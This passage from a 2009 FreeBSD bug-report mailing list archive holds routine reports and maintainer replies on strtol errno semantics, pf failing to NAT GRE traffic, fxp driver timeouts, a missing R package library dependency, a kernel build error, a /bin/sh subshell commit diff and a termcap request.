errno to 0 when converting MAX_INT=2147483647 Date: Tue, 23 Jun 2009 12:02:12 +1000 (EST) On Mon, 22 Jun 2009, Yuri wrote: >> Description: > When strtol is supplied string 2147483647 it's impossible to distinguish between overflow and non-overflow situation since return value is the same one that flags overflow (MAX_INT) and strtol doesn't clear errno in this case. No, this is easy to distinguish: set errno to 0 (or just to some value different from ERANGE) before calling strtol(), and check errno after calling strtol(). The check can be omitted unless strtol() actually returns INT_MAX. The setting before the call can only be omitted it this error can't happen or if the caller doesn't check for it. Most uses of the strtol() family get this wrong by not even checking :-(. > strtol should set errno=0 in this case to avoid ambiguity. No, strtol() must not set errno to 0. The C standard doesn't permit any library function to set errno to 0. Bruce From owner-freebsd-bugs@FreeBSD.ORG Tue Jun 23 05:20:02 2009 Return-Path: Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:4f8:fff6::34]) by hub.freebsd.org (Postfix) with ESMTP id EA1EE1065675 for ; Tue, 23 Jun 2009 05:20:01 +0000 (UTC) (envelope-from gnats@FreeBSD.org) Received: from freefall.freebsd.org (freefall.freebsd.org [IPv6:2001:4f8:fff6::28]) by mx1.freebsd.org (Postfix) with ESMTP id C60EE8FC1C for ; Tue, 23 Jun 2009 05:20:01 +0000 (UTC) (envelope-from gnats@FreeBSD.org) Received: from freefall.freebsd.org (gnats@localhost [127.0.0.1]) by freefall.freebsd.org (8.14.3/8.14.3) with ESMTP id n5N5K1QT069861 for ; Tue, 23 Jun 2009 05:20:01 GMT (envelope-from gnats@freefall.freebsd.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.14.3/8.14.3/Submit) id n5N5K1Nl069860; Tue, 23 Jun 2009 05:20:01 GMT (envelope-from gnats) Resent-Date: Tue, 23 Jun 2009 05:20:01 GMT Resent-Message-Id: <200906230520.n5N5K1Nl069860@freefall.freebsd.org> Resent-From: FreeBSD-gnats-submit@FreeBSD.org (GNATS Filer) Resent-To: freebsd-bugs@FreeBSD.org Resent-Reply-To: FreeBSD-gnats-submit@FreeBSD.org, Alexander Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:4f8:fff6::34]) by hub.freebsd.org (Postfix) with ESMTP id 857C01065670 for ; Tue, 23 Jun 2009 05:14:54 +0000 (UTC) (envelope-from nobody@FreeBSD.org) Received: from www.freebsd.org (www.freebsd.org [IPv6:2001:4f8:fff6::21]) by mx1.freebsd.org (Postfix) with ESMTP id 739D78FC22 for ; Tue, 23 Jun 2009 05:14:54 +0000 (UTC) (envelope-from nobody@FreeBSD.org) Received: from www.freebsd.org (localhost [127.0.0.1]) by www.freebsd.org (8.14.3/8.14.3) with ESMTP id n5N5Ergc023962 for ; Tue, 23 Jun 2009 05:14:53 GMT (envelope-from nobody@www.freebsd.org) Received: (from nobody@localhost) by www.freebsd.org (8.14.3/8.14.3/Submit) id n5N5ErmS023961; Tue, 23 Jun 2009 05:14:53 GMT (envelope-from nobody) Message-Id: <200906230514.n5N5ErmS023961@www.freebsd.org> Date: Tue, 23 Jun 2009 05:14:53 GMT From: Alexander To: freebsd-gnats-submit@FreeBSD.org X-Send-Pr-Version: www-3.1 Cc: Subject: kern/135948: pf not natting gre protocol X-BeenThere: freebsd-bugs@freebsd.org X-Mailman-Version: 2.1.5 Precedence: list List-Id: Bug reports List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Tue, 23 Jun 2009 05:20:02 -0000 >Number: 135948 >Category: kern >Synopsis: pf not natting gre protocol >Confidential: no >Severity: serious >Priority: medium >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Tue Jun 23 05:20:01 UTC 2009 >Closed-Date: >Last-Modified: >Originator: Alexander >Release: 7.2-RELEASE FreeBSD >Organization: dancer >Environment: FreeBSD ns1.xxxx.xx 7.2-RELEASE FreeBSD 7.2-RELEASE #2: Tue Jun 23 11:02:21 NOVST 2009 root@xx.xxxx.xx:/usr/obj/usr/src/sys/GENERIC i386 >Description: 7.2 release updated by src (from 7.1prerelease) i'm trying connect from local network to external pptp server. Phase checking login and password is stoped by timeout. pf not worked with multiplie connections gre, i know. But on this server running one mpd pptp client to another server1. And from local i try connect to external server2. killall mpd5, has no results. Protocol outed from me not natted. Also i'm tryed rebuild kernel without IPFIREWALL - no results tcpdump and my configs: kernel changed options: kernel-config #options INET6 #options SCTP device pf device pfsync device pflog options IPFIREWALL options IPFIREWALL_DEFAULT_TO_ACCEPT options IPDIVERT options DUMMYNET options NETGRAPH options NETGRAPH_VJC options NETGRAPH_PPP options NETGRAPH_SOCKET options NETGRAPH_CISCO options NETGRAPH_ECHO options NETGRAPH_FRAME_RELAY options NETGRAPH_HOLE options NETGRAPH_KSOCKET options NETGRAPH_LMI options NETGRAPH_RFC1490 options NETGRAPH_TTY options NETGRAPH_ASYNC options NETGRAPH_ETHER options NETGRAPH_IFACE options NETGRAPH_TEE options NETGRAPH_UI options NETGRAPH_PPTPGRE options NETGRAPH_PPPOE options NETGRAPH_MPPC_ENCRYPTION options NETGRAPH_BPF /etc/pf.conf tomsk_if="rl0" tomsk_gw="192.168.22.11" tomsk_ip="192.168.22.22" scrub in all nat on $tomsk_if from 172.22.3.3 to any -> ($tomsk_if) nat on $tomsk_if proto gre from any to any -> ($tomsk_if) pass in quick pass out quick tcpdump -ni rl0 11:49:43.247209 IP 192.168.22.22.52676 > 213.183.96.29.1723: S 2598945743:2598945743(0) win 65535 11:49:43.272521 IP 213.183.96.29.1723 > 192.168.22.22.52676: S 3289213647:3289213647(0) ack 2598945744 win 65535 11:49:43.272793 IP 192.168.22.22.52676 > 213.183.96.29.1723: P 1:157(156) ack 1 win 65535: pptp CTRL_MSGTYPE=SCCRQ PROTO_VER(1.0) FRAME_CAP(A) BEARER_CAP(A) MAX_CHAN(0) FIRM_REV(2600) [|pptp] 11:49:43.291500 IP 213.183.96.29.1723 > 192.168.22.22.52676: P 1:157(156) ack 157 win 65535: pptp CTRL_MSGTYPE=SCCRP PROTO_VER(1.0) RESULT_CODE(1) ERR_CODE(0) FRAME_CAP(AS) BEARER_CAP(DA) MAX_CHAN(0) FIRM_REV(257) [|pptp] 11:49:43.291654 IP 192.168.22.22.52676 > 213.183.96.29.1723: P 157:325(168) ack 157 win 65379: pptp CTRL_MSGTYPE=OCRQ CALL_ID(32768) CALL_SER_NUM(60053) MIN_BPS(300) MAX_BPS(100000000) BEARER_TYPE(Any) FRAME_TYPE(E) RECV_WIN(64) PROC_DELAY(0) PHONE_NO_LEN(0) [|pptp] 11:49:43.310932 IP 213.183.96.29.1723 > 192.168.22.22.52676: P 157:189(32) ack 325 win 65535: pptp CTRL_MSGTYPE=OCRP CALL_ID(62486) PEER_CALL_ID(32768) RESULT_CODE(1) ERR_CODE(0) CAUSE_CODE(0) CONN_SPEED(64000) RECV_WIN(16) PROC_DELAY(1) PHY_CHAN_ID(131072) 11:49:43.311393 IP 213.183.96.29 > 192.168.22.22: GREv1, call 32768, seq 0, length 39: LCP, Conf-Request (0x01), id 1, length 25 11:49:43.315766 IP 192.168.22.22.52676 > 213.183.96.29.1723: P 325:349(24) ack 189 win 65347: pptp CTRL_MSGTYPE=SLI PEER_CALL_ID(62486) SEND_ACCM(0xffffffff) RECV_ACCM(0xffffffff) 11:49:43.319020 IP 172.22.3.3 > 213.183.96.29: GREv1, call 62486, seq 0, length 37: LCP, Conf-Request (0x01), id 0, length 23 11:49:43.335801 IP 213.183.96.29 > 192.168.22.22: GREv1, call 32768, seq 1, ack 0, length 27: LCP, Conf-Reject (0x04), id 0, length 9 11:49:43.434641 IP 213.183.96.29.1723 > 192.168.22.22.52676: . ack 349 win 65535 11:49:45.304695 IP 172.22.3.3 > 213.183.96.29: GREv1, call 62486, seq 1, length 37: LCP, Conf-Request (0x01), id 1, length 23 sorry for my english language if this problem not solved? where is im reading official document for IPFIREWALL NAT in kernel mode. i'm use second freebsd 7.2 server and try connect on him, but so no result. p.s. server two not using mpd and any other vpn connections. But i try connect pptp client from local and 10% connections successed, not change config and 90% gre not natted. What is this. I read reports for multiplie connectinos and trying use frickin pptp proxy, but no result so. i think gre not aver using pf rules or pf ignore him :( >How-To-Repeat: allways >Fix: >Release-Note: >Audit-Trail: >Unformatted: From owner-freebsd-bugs@FreeBSD.ORG Tue Jun 23 08:14:28 2009 Return-Path: Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:4f8:fff6::34]) by hub.freebsd.org (Postfix) with ESMTP id 571151065677; Tue, 23 Jun 2009 08:14:28 +0000 (UTC) (envelope-from yongari@FreeBSD.org) Received: from freefall.freebsd.org (freefall.freebsd.org [IPv6:2001:4f8:fff6::28]) by mx1.freebsd.org (Postfix) with ESMTP id 45A298FC13; Tue, 23 Jun 2009 08:14:28 +0000 (UTC) (envelope-from yongari@FreeBSD.org) Received: from freefall.freebsd.org (yongari@localhost [127.0.0.1]) by freefall.freebsd.org (8.14.3/8.14.3) with ESMTP id n5N8ESCk039536; Tue, 23 Jun 2009 08:14:28 GMT (envelope-from yongari@freefall.freebsd.org) Received: (from yongari@localhost) by freefall.freebsd.org (8.14.3/8.14.3/Submit) id n5N8ERdg039532; Tue, 23 Jun 2009 08:14:27 GMT (envelope-from yongari) Date: Tue, 23 Jun 2009 08:14:27 GMT Message-Id: <200906230814.n5N8ERdg039532@freefall.freebsd.org> To: ralf.folkerts@gmx.de, yongari@FreeBSD.org, freebsd-bugs@FreeBSD.org, yongari@FreeBSD.org From: yongari@FreeBSD.org Cc: Subject: Re: kern/113427: [fxp] fxp0: device timeout when writing to USB and play Sound. X-BeenThere: freebsd-bugs@freebsd.org X-Mailman-Version: 2.1.5 Precedence: list List-Id: Bug reports List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Tue, 23 Jun 2009 08:14:28 -0000 Synopsis: [fxp] fxp0: device timeout when writing to USB and play Sound. State-Changed-From-To: open->feedback State-Changed-By: yongari State-Changed-When: Tue Jun 23 08:13:41 UTC 2009 State-Changed-Why: There was a lot of fxp(4) changes in HEAD and I guess latest fxp(4) may fix your watchdog timeout issues. Blindly enabling Rx lock-up workaround may also have triggered the issue. Could you try fxp(4) in HEAD? If you're using 7-stable or 7.2-RELEASE you can just copy if_fxp.c, if_fxpreg.h and if_fxpvar.h from HEAD to 7-stable/7.2-RELEASE and rebuild kernel. Responsible-Changed-From-To: freebsd-bugs->yongari Responsible-Changed-By: yongari Responsible-Changed-When: Tue Jun 23 08:13:41 UTC 2009 Responsible-Changed-Why: Grab. http://www.freebsd.org/cgi/query-pr.cgi?pr=113427 From owner-freebsd-bugs@FreeBSD.ORG Tue Jun 23 11:10:04 2009 Return-Path: Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:4f8:fff6::34]) by hub.freebsd.org (Postfix) with ESMTP id 60EB8106564A for ; Tue, 23 Jun 2009 11:10:04 +0000 (UTC) (envelope-from gnats@FreeBSD.org) Received: from freefall.freebsd.org (freefall.freebsd.org [IPv6:2001:4f8:fff6::28]) by mx1.freebsd.org (Postfix) with ESMTP id 3497B8FC08 for ; Tue, 23 Jun 2009 11:10:04 +0000 (UTC) (envelope-from gnats@FreeBSD.org) Received: from freefall.freebsd.org (gnats@localhost [127.0.0.1]) by freefall.freebsd.org (8.14.3/8.14.3) with ESMTP id n5NBA2Oc070368 for ; Tue, 23 Jun 2009 11:10:02 GMT (envelope-from gnats@freefall.freebsd.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.14.3/8.14.3/Submit) id n5NBA2lF070367; Tue, 23 Jun 2009 11:10:02 GMT (envelope-from gnats) Date: Tue, 23 Jun 2009 11:10:02 GMT Message-Id: <200906231110.n5NBA2lF070367@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org From: Valentin Davydov Cc: Subject: Re: bin/135918: [patch] Make BootEasy compatible with NT Drive Serial Number by default X-BeenThere: freebsd-bugs@freebsd.org X-Mailman-Version: 2.1.5 Precedence: list Reply-To: Valentin Davydov List-Id: Bug reports List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Tue, 23 Jun 2009 11:10:04 -0000 The following reply was made to PR bin/135918; it has been noted by GNATS. From: Valentin Davydov To: bug-followup@FreeBSD.org, eugen@kuzbass.ru Cc: Subject: Re: bin/135918: [patch] Make BootEasy compatible with NT Drive Serial Number by default Date: Tue, 23 Jun 2009 14:39:55 +0400 (MSD) Patch tested with FreeBSD RELENG_7 and Windows 7 beta on an i386 machine. Works perfectly. Valentin Davydov. From owner-freebsd-bugs@FreeBSD.ORG Tue Jun 23 15:10:03 2009 Return-Path: Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:4f8:fff6::34]) by hub.freebsd.org (Postfix) with ESMTP id 5AA021065679 for ; Tue, 23 Jun 2009 15:10:03 +0000 (UTC) (envelope-from gnats@FreeBSD.org) Received: from freefall.freebsd.org (freefall.freebsd.org [IPv6:2001:4f8:fff6::28]) by mx1.freebsd.org (Postfix) with ESMTP id 1C7C28FC24 for ; Tue, 23 Jun 2009 15:10:03 +0000 (UTC) (envelope-from gnats@FreeBSD.org) Received: from freefall.freebsd.org (gnats@localhost [127.0.0.1]) by freefall.freebsd.org (8.14.3/8.14.3) with ESMTP id n5NFA20k058950 for ; Tue, 23 Jun 2009 15:10:02 GMT (envelope-from gnats@freefall.freebsd.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.14.3/8.14.3/Submit) id n5NFA2oG058949; Tue, 23 Jun 2009 15:10:02 GMT (envelope-from gnats) Resent-Date: Tue, 23 Jun 2009 15:10:02 GMT Resent-Message-Id: <200906231510.n5NFA2oG058949@freefall.freebsd.org> Resent-From: FreeBSD-gnats-submit@FreeBSD.org (GNATS Filer) Resent-To: freebsd-bugs@FreeBSD.org Resent-Reply-To: FreeBSD-gnats-submit@FreeBSD.org, Thomas Dreibholz Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:4f8:fff6::34]) by hub.freebsd.org (Postfix) with ESMTP id 78DC910656DF for ; Tue, 23 Jun 2009 15:08:22 +0000 (UTC) (envelope-from nobody@FreeBSD.org) Received: from www.freebsd.org (www.freebsd.org [IPv6:2001:4f8:fff6::21]) by mx1.freebsd.org (Postfix) with ESMTP id 5B4E88FC25 for ; Tue, 23 Jun 2009 15:08:22 +0000 (UTC) (envelope-from nobody@FreeBSD.org) Received: from www.freebsd.org (localhost [127.0.0.1]) by www.freebsd.org (8.14.3/8.14.3) with ESMTP id n5NF8LRG011259 for ; Tue, 23 Jun 2009 15:08:21 GMT (envelope-from nobody@www.freebsd.org) Received: (from nobody@localhost) by www.freebsd.org (8.14.3/8.14.3/Submit) id n5NF8Luj011258; Tue, 23 Jun 2009 15:08:21 GMT (envelope-from nobody) Message-Id: <200906231508.n5NF8Luj011258@www.freebsd.org> Date: Tue, 23 Jun 2009 15:08:21 GMT From: Thomas Dreibholz To: freebsd-gnats-submit@FreeBSD.org X-Send-Pr-Version: www-3.1 Cc: Subject: misc/135967: GNU R package: missing dependency for libgfortran.so.2 X-BeenThere: freebsd-bugs@freebsd.org X-Mailman-Version: 2.1.5 Precedence: list List-Id: Bug reports List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Tue, 23 Jun 2009 15:10:03 -0000 >Number: 135967 >Category: misc >Synopsis: GNU R package: missing dependency for libgfortran.so.2 >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Tue Jun 23 15:10:02 UTC 2009 >Closed-Date: >Last-Modified: >Originator: Thomas Dreibholz >Release: 7.1 >Organization: University of Duisburg-Essen, Institute for Experimental Mathematics >Environment: FreeBSD essen 7.1-RELEASE-p6 FreeBSD 7.1-RELEASE-p6 #13: Tue Jun 23 16:54:31 CEST 2009 root@essen:/usr/src/sys/amd64/compile/SCTP amd64 >Description: After installing GNU R (using pkg_add -r R), R cannot find its required library libgfortran.so.2. Full error message when starting R: /libexec/ld-elf.so.1: Shared object "libgfortran.so.2" not found, required by "libR.so" >How-To-Repeat: pkg_add -r R R >Fix: >Release-Note: >Audit-Trail: >Unformatted: From owner-freebsd-bugs@FreeBSD.ORG Tue Jun 23 18:02:53 2009 Return-Path: Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:4f8:fff6::34]) by hub.freebsd.org (Postfix) with ESMTP id 8BAD31065688; Tue, 23 Jun 2009 18:02:53 +0000 (UTC) (envelope-from brian@FreeBSD.org) Received: from freefall.freebsd.org (freefall.freebsd.org [IPv6:2001:4f8:fff6::28]) by mx1.freebsd.org (Postfix) with ESMTP id 6091C8FC17; Tue, 23 Jun 2009 18:02:53 +0000 (UTC) (envelope-from brian@FreeBSD.org) Received: from freefall.freebsd.org (brian@localhost [127.0.0.1]) by freefall.freebsd.org (8.14.3/8.14.3) with ESMTP id n5NI2rhu098928; Tue, 23 Jun 2009 18:02:53 GMT (envelope-from brian@freefall.freebsd.org) Received: (from brian@localhost) by freefall.freebsd.org (8.14.3/8.14.3/Submit) id n5NI2r8w098924; Tue, 23 Jun 2009 18:02:53 GMT (envelope-from brian) Date: Tue, 23 Jun 2009 18:02:53 GMT Message-Id: <200906231802.n5NI2r8w098924@freefall.freebsd.org> To: dreibh@iem.uni-due.de, brian@FreeBSD.org, freebsd-bugs@FreeBSD.org From: brian@FreeBSD.org Cc: Subject: Re: misc/135967: GNU R package: missing dependency for libgfortran.so.2 X-BeenThere: freebsd-bugs@freebsd.org X-Mailman-Version: 2.1.5 Precedence: list List-Id: Bug reports List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Tue, 23 Jun 2009 18:02:53 -0000 Synopsis: GNU R package: missing dependency for libgfortran.so.2 State-Changed-From-To: open->feedback State-Changed-By: brian State-Changed-When: Tue Jun 23 17:59:15 UTC 2009 State-Changed-Why: Hi, This has the same behaviour for me on FreeBSD-6.4 and FreeBSD-7.2. libR depends on gcc-4.3.4 which installs libgfortran.so.3 in /usr/local/lib/gcc43. Does it fix things if you `ldconfig -R /usr/local/lib/gcc43/`? If it does, we can probably assign this PR to the gcc43 maintainers and you can work around the problem by adding /usr/local/lib/gcc43 to ldconfig_paths in /etc/rc.conf. Cheers. http://www.freebsd.org/cgi/query-pr.cgi?pr=135967 From owner-freebsd-bugs@FreeBSD.ORG Tue Jun 23 19:10:11 2009 Return-Path: Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:4f8:fff6::34]) by hub.freebsd.org (Postfix) with ESMTP id B1FD8106566C for ; Tue, 23 Jun 2009 19:10:08 +0000 (UTC) (envelope-from gnats@FreeBSD.org) Received: from freefall.freebsd.org (freefall.freebsd.org [IPv6:2001:4f8:fff6::28]) by mx1.freebsd.org (Postfix) with ESMTP id 734D48FC27 for ; Tue, 23 Jun 2009 19:10:01 +0000 (UTC) (envelope-from gnats@FreeBSD.org) Received: from freefall.freebsd.org (gnats@localhost [127.0.0.1]) by freefall.freebsd.org (8.14.3/8.14.3) with ESMTP id n5NJA1nD046392 for ; Tue, 23 Jun 2009 19:10:01 GMT (envelope-from gnats@freefall.freebsd.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.14.3/8.14.3/Submit) id n5NJA1Vc046391; Tue, 23 Jun 2009 19:10:01 GMT (envelope-from gnats) Resent-Date: Tue, 23 Jun 2009 19:10:01 GMT Resent-Message-Id: <200906231910.n5NJA1Vc046391@freefall.freebsd.org> Resent-From: FreeBSD-gnats-submit@FreeBSD.org (GNATS Filer) Resent-To: freebsd-bugs@FreeBSD.org Resent-Reply-To: FreeBSD-gnats-submit@FreeBSD.org, dave@daveg.ca Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:4f8:fff6::34]) by hub.freebsd.org (Postfix) with ESMTP id 96C97106566C for ; Tue, 23 Jun 2009 19:03:54 +0000 (UTC) (envelope-from root@daveg.ca) Received: from ox.eicat.ca (ox.eicat.ca [66.96.30.35]) by mx1.freebsd.org (Postfix) with ESMTP id 737088FC0A for ; Tue, 23 Jun 2009 19:03:54 +0000 (UTC) (envelope-from root@daveg.ca) Received: by ox.eicat.ca (Postfix, from userid 66) id 9387695A01; Tue, 23 Jun 2009 14:42:14 -0400 (EDT) Received: by canoe.dclg.ca (Postfix, from userid 0) id DBC6C11C5; Tue, 23 Jun 2009 14:41:38 -0400 (EDT) Message-Id: <20090623184138.DBC6C11C5@canoe.dclg.ca> Date: Tue, 23 Jun 2009 14:41:38 -0400 (EDT) From: dave@daveg.ca To: FreeBSD-gnats-submit@FreeBSD.org X-Send-Pr-Version: 3.113 Cc: Subject: kern/135976: kernel won't compile w/o options AH_SUPPORT_AR5416 X-BeenThere: freebsd-bugs@freebsd.org X-Mailman-Version: 2.1.5 Precedence: list Reply-To: dave@daveg.ca List-Id: Bug reports List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Tue, 23 Jun 2009 19:10:15 -0000 >Number: 135976 >Category: kern >Synopsis: kernel won't compile w/o options AH_SUPPORT_AR5416 >Confidential: no >Severity: serious >Priority: medium >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Tue Jun 23 19:10:01 UTC 2009 >Closed-Date: >Last-Modified: >Originator: David Gilbert >Release: FreeBSD 7.1-STABLE amd64 >Organization: DaveG.ca >Environment: System: FreeBSD canoe.dclg.ca 7.1-STABLE FreeBSD 7.1-STABLE #3: Wed Jan 14 04:27:34 EST 2009 dgilbert@canoe.dclg.ca:/canoe/64/usr/obj/canoe/64/usr/src/sys/CANOE64 amd64 In this case I'm compiling 7.2-STABLE on 7.1-STABLE. >Description: If options AH_SUPPORT_AR5416 is omitted (and I assume device ath is included), the kernel won't compile... failing some some symbols. >How-To-Repeat: Compile a kernel w/o options AH_SUPPORT_AR5416 and with device ath. >Fix: I don't have a fix >Release-Note: >Audit-Trail: >Unformatted: From owner-freebsd-bugs@FreeBSD.ORG Tue Jun 23 22:00:13 2009 Return-Path: Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:4f8:fff6::34]) by hub.freebsd.org (Postfix) with ESMTP id 256531065673 for ; Tue, 23 Jun 2009 22:00:13 +0000 (UTC) (envelope-from gnats@FreeBSD.org) Received: from freefall.freebsd.org (freefall.freebsd.org [IPv6:2001:4f8:fff6::28]) by mx1.freebsd.org (Postfix) with ESMTP id 138778FC14 for ; Tue, 23 Jun 2009 22:00:13 +0000 (UTC) (envelope-from gnats@FreeBSD.org) Received: from freefall.freebsd.org (gnats@localhost [127.0.0.1]) by freefall.freebsd.org (8.14.3/8.14.3) with ESMTP id n5NM0Cw5077910 for ; Tue, 23 Jun 2009 22:00:12 GMT (envelope-from gnats@freefall.freebsd.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.14.3/8.14.3/Submit) id n5NM0CdX077909; Tue, 23 Jun 2009 22:00:12 GMT (envelope-from gnats) Date: Tue, 23 Jun 2009 22:00:12 GMT Message-Id: <200906232200.n5NM0CdX077909@freefall.freebsd.org> To: freebsd-bugs@FreeBSD.org From: dfilter@FreeBSD.ORG (dfilter service) Cc: Subject: Re: bin/74404: commit references a PR X-BeenThere: freebsd-bugs@freebsd.org X-Mailman-Version: 2.1.5 Precedence: list Reply-To: dfilter service List-Id: Bug reports List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Tue, 23 Jun 2009 22:00:13 -0000 The following reply was made to PR bin/74404; it has been noted by GNATS. From: dfilter@FreeBSD.ORG (dfilter service) To: bug-followup@FreeBSD.org Cc: Subject: Re: bin/74404: commit references a PR Date: Tue, 23 Jun 2009 21:50:17 +0000 (UTC) Author: jilles Date: Tue Jun 23 21:50:06 2009 New Revision: 194774 URL: http://svn.freebsd.org/changeset/base/194774 Log: Do not fork for a subshell if it is the last thing this shell is doing (EV_EXIT). The fork is still done as normal if any traps are active. In many cases, the fork can be avoided even without this change by using {} instead of (), but in practice many scripts use (), likely because the syntax is simpler. Example: sh -c '(/bin/sleep 10)& sleep 1;ps -p $! -o comm=' Now prints "sleep" instead of "sh". $! is more useful this way. Most shells (dash, bash, pdksh, ksh93, zsh) seem to print "sleep" for this. Example: sh -c '( ( ( (ps jT))))' Now shows no waiting shell processes instead of four. Most shells (dash, bash, pdksh, ksh93, zsh) seem to show zero or one. PR: bin/74404 Approved by: ed (mentor) (implicit) Modified: head/bin/sh/eval.c Modified: head/bin/sh/eval.c ============================================================================== --- head/bin/sh/eval.c Tue Jun 23 21:48:04 2009 (r194773) +++ head/bin/sh/eval.c Tue Jun 23 21:50:06 2009 (r194774) @@ -401,8 +401,8 @@ evalsubshell(union node *n, int flags) int backgnd = (n->type == NBACKGND); expredir(n->nredir.redirect); - jp = makejob(n, 1); - if (forkshell(jp, n, backgnd) == 0) { + if ((!backgnd && flags & EV_EXIT && !have_traps()) || + forkshell(jp = makejob(n, 1), n, backgnd) == 0) { if (backgnd) flags &=~ EV_TESTED; redirect(n->nredir.redirect, 0); _______________________________________________ svn-src-all@freebsd.org mailing list http://lists.freebsd.org/mailman/listinfo/svn-src-all To unsubscribe, send any mail to "svn-src-all-unsubscribe@freebsd.org" From owner-freebsd-bugs@FreeBSD.ORG Tue Jun 23 22:31:06 2009 Return-Path: Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:4f8:fff6::34]) by hub.freebsd.org (Postfix) with ESMTP id 6DB251065697; Tue, 23 Jun 2009 22:31:06 +0000 (UTC) (envelope-from edwin@FreeBSD.org) Received: from freefall.freebsd.org (freefall.freebsd.org [IPv6:2001:4f8:fff6::28]) by mx1.freebsd.org (Postfix) with ESMTP id 44A178FC27; Tue, 23 Jun 2009 22:31:06 +0000 (UTC) (envelope-from edwin@FreeBSD.org) Received: from freefall.freebsd.org (edwin@localhost [127.0.0.1]) by freefall.freebsd.org (8.14.3/8.14.3) with ESMTP id n5NMV6DL006951; Tue, 23 Jun 2009 22:31:06 GMT (envelope-from edwin@freefall.freebsd.org) Received: (from edwin@localhost) by freefall.freebsd.org (8.14.3/8.14.3/Submit) id n5NMV6IV006943; Tue, 23 Jun 2009 22:31:06 GMT (envelope-from edwin) Date: Tue, 23 Jun 2009 22:31:06 GMT Message-Id: <200906232231.n5NMV6IV006943@freefall.freebsd.org> To: oivulf@gmail.com, edwin@FreeBSD.org, freebsd-bugs@FreeBSD.org From: edwin@FreeBSD.org Cc: Subject: Re: conf/128874: [termcap] termcap entry for rxvt missing :AX: capability X-BeenThere: freebsd-bugs@freebsd.org X-Mailman-Version: 2.1.5 Precedence: list List-Id: Bug reports List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , X-List-Received-Date: Tue, 23 Jun 2009 22:31:07 -0000 Synopsis: [termcap] termcap entry for rxvt missing :AX: capability State-Changed-From-To: open->feedback State-Changed-By: edwin State-Changed-When: Tue Jun 23 22:30:39 UTC 2009 State-Changed-Why: Could you see if you could give us patches to implement this issue? http://www.freebsd.org/cgi/query-pr.cgi?pr=128874 From owner-freebsd-bugs@FreeBSD.ORG Wed Jun 24 01:40:01 2009 Return-Path: Delivered-To: freebsd-bugs@hub.freebsd.org Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:4f8:fff6::34]) by hub.freebsd.org (Postfix) with ESMTP id A150D1065674 for ; Wed, 24 Jun 2009 01:40:01 +0000 (UTC) (envelope-from gnats@FreeBSD.org) Received: from freefall.freebsd.org (freefall.freebsd.org [IPv6:2001:4f8:fff6::28]) by mx1.freebsd.org (Postfix) with ESMTP id 7C2AF8FC21 for ; Wed, 24 Jun 2009 01:40:01 +0000 (UTC) (envelope-from gnats@FreeBSD.org) Received: from freefall.freebsd.org (gnats@localhost [127.0.0.1]) by freefall.freebsd.org (8.14.3/8.14.3) with ESMTP id n5O1e1j9048066 for ; Wed, 24 Jun 2009 01:40:01 GMT (envelope-from gnats@freefall.freebsd.org) Received: (from gnats@localhost) by freefall.freebsd.org (8.14.3/8.14.3/Submit) id n5O1e164048065; Wed, 24 Jun 2009 01:40:01 GMT (envelope-from gnats) Resent-Date: Wed, 24 Jun 2009 01:40:01 GMT Resent-Message-Id: <200906240140.n5O1e164048065@freefall.freebsd.org> Resent-From: FreeBSD-gnats-submit@FreeBSD.org (GNATS Filer) Resent-To: freebsd-bugs@FreeBSD.org Resent-Reply-To: FreeBSD-gnats-submit@FreeBSD.org, Alexey Ivanov Received: from mx1.freebsd.org (mx1.freebsd.org [IPv6:2001:4f8:fff6::34]) by hub.freebsd.org (Postfix) with ESMTP id E7E22106564A for ; Wed, 24 Jun 2009 01:36:31 +0000 (UTC) (envelope-from nobody@FreeBSD.org) Received: from www.freebsd.org (www.freebsd.org [IPv6:2001:4f8:fff6::21]) by mx1.freebsd.org (Postfix) with ESMTP id D51408FC0A for ; Wed, 24 Jun 2009 01:36:31 +0000 (UTC) (envelope-from nobody@FreeBSD.org) Received: from www.freebsd.org (localhost [127.0.0.1]) by www.freebsd.org (8.14.3/8.14.3) with ESMTP id n5O1aVq0041395 for ; Wed, 24 Jun 2009 01:36:31 GMT (envelope-from nobody@www.freebsd.org) Received: (from nobody@localhost) by www.freebsd.org 